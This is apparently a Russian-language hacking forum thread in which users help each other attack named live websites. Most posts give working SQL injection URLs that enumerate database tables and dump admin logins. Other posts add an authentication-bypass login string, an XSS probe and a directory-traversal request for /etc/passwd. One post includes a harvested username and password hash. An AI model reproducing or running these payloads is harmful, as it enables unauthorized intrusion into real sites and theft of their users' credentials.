Конечно не выводит, это тебе не MYSQL, это PostgreSql. Почитай мануалы. Правильный запрос, чтобы посмотреть колонки, к примеру из таблы tk_users: Code: http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+COLUMN_NAME+FROM+INFORMATION_sCHEMA.COLUMNS+WHERE+TABLE_NAME=chr(116)||chr(107)||chr(95)||chr(117)||chr(115)||chr(101)||chr(114)||chr(115)+LIMIT+1+offset+0--
Вот тоже скуль http://www.techcenter.com.ua/info3.php?id=17498%20order%20by%201%20-- а дальше не пойму..
Возможно в коде просто идет два запроса к БД подряд, по этому он и выдает The used SELECT statements have a different number of columns, попробуй использовать подзапросы
$userdata = session_pagestart($user_ip, PAGE_LOGIN); init_userprefs($userdata); if ($sid == '' || $sid != $userdata['session_id']) { message_die(GENERAL_ERROR, 'Invalid_session'); } $session_id = session_begin($row['user_id'], $user_ip, PAGE_INDEX, FALSE, $autologin, $admin); Вот куски кода могу весь выложить если нужно!!
Помогите с проблемой есть сайтик "_http://www.nb-torg.ru/" CMS - CNStats 3.3 Нашел такие проблемки в нем: XSS http://www.nb-torg.ru/search/?search="><script>alert("error");</script> и отсутствие фильтрации MySQL http://www.nb-torg.ru/gd/-17 Что можно интересного придумать с SQL как разобрать если не сложно подскажите! Заранее спасибо!
Чего ты вот это морочишься... Мысли глобально... Заходи в админку: Логин: admin' OR 1=1# Пароль любой... Редирект не сработает, но если пораскинуть мозгами, можно тупо потом ввести: http://www.nb-torg.ru/admin/main.php вуаля - ты одмин З.Ы. Я поражен, неужели это CMS?
Да, это не основная админка, но опять же - учитесь мыслить глобально... У вас уже есть доступ в админку первого уровня... Она бажная... Находим в ней инъекцию и раскручиваем: http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,TABLE_NAME,3,4,5+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+X,1-- http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,CONCAT_WS(0x3a,TABLE_SCHEMA,TABLE_NAME),3,4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+LIKE+'%25admin%25'+LIMIT+X,1-- http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,CONCAT_WS(0x3a,TABLE_NAME,COLUMN_NAME),3,4,5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='cns_users'+LIMIT+X,1-- http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,TABLE_NAME,3,4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+LIKE+'%25user%25'+AND+TABLE_SCHEMA=DATABASE()+LIMIT+X,1-- http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,CONCAT_WS(0x3a,ID,NAME,PASSWORD,EMAIL,ICQ),3,4,5+FROM+frb_users+LIMIT+X,1--
Остальное уже разобрал: http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,concat(login,char(58),password),3,4,5+FROM+db5971c.cns_users+limit+0,1-- Единственный косяк с пассом не могу понять login: bolt pass: *8BB679C6BFDA0D1AAFC77A05A7A01DBFF48F10A5
http://37-77.ru/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd Это как использовать???
